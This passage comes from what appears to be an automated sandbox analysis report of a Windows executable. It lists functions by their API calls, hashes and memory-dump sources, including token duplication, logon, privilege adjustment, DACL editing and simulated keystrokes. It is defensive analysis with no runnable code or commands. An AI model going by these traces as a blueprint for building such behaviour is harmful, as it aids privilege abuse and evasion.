                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a55fe2c60a42636a47b13dc645afb0d8ac4e7e852ca846f024736daa728ce479
                                                                                                                                                                                                                                                                                    • Instruction ID: ff1c6809774ff3bdf592e757c890cb3aaa5b5f3fda4c5c46cb6061fe083f42de
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a55fe2c60a42636a47b13dc645afb0d8ac4e7e852ca846f024736daa728ce479
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F0B432610E24EBDB311AA69C09B9B3BD8EFC47E0F554091B804A70A0DA60D98186E4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ae963a980a0fbdd7a5f275e3de75a9c7d17ea2d74d6af22c2a7cfd987dd61c39
                                                                                                                                                                                                                                                                                    • Instruction ID: f39518826800bc719ae60f3196de4b3d9ea6a2a7c1654d0f7a6e814c3f20c066
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae963a980a0fbdd7a5f275e3de75a9c7d17ea2d74d6af22c2a7cfd987dd61c39
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEE0652124862166DA3127769C01BDB3AD8DF41BA4F9501E1EC05E79E1FF64DDC085A4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: acb92b1c7a8d589b7d078cce8702c89c370d7cf8ea6dbd3b2f4228f31cc9035f
                                                                                                                                                                                                                                                                                    • Instruction ID: d758548002399595d6376a87122604225443eec09be0694c1be1db90b7110d09
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acb92b1c7a8d589b7d078cce8702c89c370d7cf8ea6dbd3b2f4228f31cc9035f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF015B1105792CFCB789F65E8A0816BBF4AF243693248D7EE5DA86A10C7319880DF10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d3a051188a28de1a8c65a3f3ce14af78a16228520b332fcd535345d2ab6b9da4
                                                                                                                                                                                                                                                                                    • Instruction ID: 1825078c4b0ec1ce0818e6c0683839f049d6f4346f99c2ba64e5f247072ecfc5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3a051188a28de1a8c65a3f3ce14af78a16228520b332fcd535345d2ab6b9da4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F0E571704205BAD7205BA89C497B1F7E8FB10314F2085AAE5D583181D7F254D497D1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                    • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                    • Instruction ID: f19987c1807de24a095213ad546fbcc2df6fd56b2938b2a76d3a935dacd74ebf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF0F87550020DFFDF05DF90C941EAE7BB9FB18318F208485F9159A151C336EA21ABA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AE3963
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8f220c758264099817b81a510ab83713984fcdc36e082d2481a7db6955ffbeef
                                                                                                                                                                                                                                                                                    • Instruction ID: 7da49785ce776a02fea304bb076e68fb236fa25a5ae1676e57e8af5e402dc64d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f220c758264099817b81a510ab83713984fcdc36e082d2481a7db6955ffbeef
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF0A7709043049FEB539F24DC497967BFCA701708F0001E5A248A7282DBB44788CF45
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AE3A76
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e951a6433648fb3fc7d4fedbd6b2208c910c290d8987de20f31f4bf9a184568c
                                                                                                                                                                                                                                                                                    • Instruction ID: 329fc2bfcf3cf7308a31fcd203effbc9531820f4fd8b479e7593119d665508c9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e951a6433648fb3fc7d4fedbd6b2208c910c290d8987de20f31f4bf9a184568c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE08C72A002246BCB20A658AC06FEA77EDDF887A0F0440B5BC09D7258DD64AD8086A0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00B20A84,?,?,00000000,?,00B20A84,00000000,0000000C), ref: 00B20737
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                    • Opcode ID: dc66f3d875f5d41d8134137a0a9cc71cbb035c27ebd95b8b67a393c2eb8a56f8
                                                                                                                                                                                                                                                                                    • Instruction ID: acf0e916b15847f76e7233462902a343a916736a119c7724385a4e8fa3b8a80f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc66f3d875f5d41d8134137a0a9cc71cbb035c27ebd95b8b67a393c2eb8a56f8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9D06C3200010DBBDF028F84DD06EDA3BAAFB48754F014050BE1866020C732E861AB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e5a693a32de3da228499312fba08377526380e9e1e4700a24255ea5ee5a8e0ab
                                                                                                                                                                                                                                                                                    • Instruction ID: 5482537aba9beafc9a930d605a32b2e30a1fd109465c5c69f6dfda9dfbb36997
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5a693a32de3da228499312fba08377526380e9e1e4700a24255ea5ee5a8e0ab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41B0922400060005AD380E389A099A93390B8423E57DC1FC0E479960F2C739C94FB950
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DC54: FindFirstFileW.KERNEL32(?,?), ref: 00B4DCCB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DD1B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B4DD2C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DC54: FindClose.KERNEL32(00000000), ref: 00B4DD43
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B5666E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7f11a1a9a9c914aabd27d9f27ba8e10d0cc019691c458073ced7b340ded51405
                                                                                                                                                                                                                                                                                    • Instruction ID: 4cc74538d338162bc996d2073cfdfc91bf661c257350e037c6663ace32983ce7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f11a1a9a9c914aabd27d9f27ba8e10d0cc019691c458073ced7b340ded51405
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F0A0362002148FCB10EF59D955B6EB7E5EF88360F048449F90A9B352CB74FC01CB95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00AFFC86
                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3FCB8
                                                                                                                                                                                                                                                                                    • IsIconic.USER32(00000000), ref: 00B3FCC1
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 00B3FCCE
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00B3FCD8
                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B3FCEE
                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B3FCF5
                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B3FD01
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B3FD12
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B3FD1A
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B3FD22
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00B3FD25
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD3A
                                                                                                                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B3FD45
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD4F
                                                                                                                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B3FD54
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD5D
                                                                                                                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B3FD62
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD6C
                                                                                                                                                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B3FD71
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00B3FD74
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B3FD9B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                                                                    • Opcode ID: a8c567f9c0185c03bddad875173d3e7442fca16020068a92c07a43f950a105e4
                                                                                                                                                                                                                                                                                    • Instruction ID: 627d8b3b29bdf081b4ae0d499e10b5d3340f54bced23a471441561d02b769007
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c567f9c0185c03bddad875173d3e7442fca16020068a92c07a43f950a105e4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C312171A802187FEB216BA55C49F7E7EBCEF44B90F100069FA05FB1D1DAB05D40AAA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42010: GetLastError.KERNEL32 ref: 00B42097
                                                                                                                                                                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B41BD2
                                                                                                                                                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B41BF4
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B41C05
                                                                                                                                                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B41C1D
                                                                                                                                                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 00B41C36
                                                                                                                                                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00B41C40
                                                                                                                                                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B41C5C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B41B48), ref: 00B41A20
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A0B: CloseHandle.KERNEL32(?,?,00B41B48), ref: 00B41A35
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                    • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                    • Opcode ID: fd81ec59d2829d17ca7f4bf67bc442ec2aabe46d210958fb71396ef6417d2371
                                                                                                                                                                                                                                                                                    • Instruction ID: 4f541d9b971d66bcc554260d685bfa3b08a10edfdd5e07b395816f893b3d6764
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd81ec59d2829d17ca7f4bf67bc442ec2aabe46d210958fb71396ef6417d2371
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6815AB1D00209ABDF119FA8DC49FEE7BF8EF04340F1444A9F915A62A0DB718A85DB64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B41A60
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A6C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A7B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A82
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B41A99
                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B41518
                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B4154C
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B41563
                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00B4159D
                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B415B9
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B415D0
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B415D8
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B415DF
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B41600
                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00B41607
                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B41636
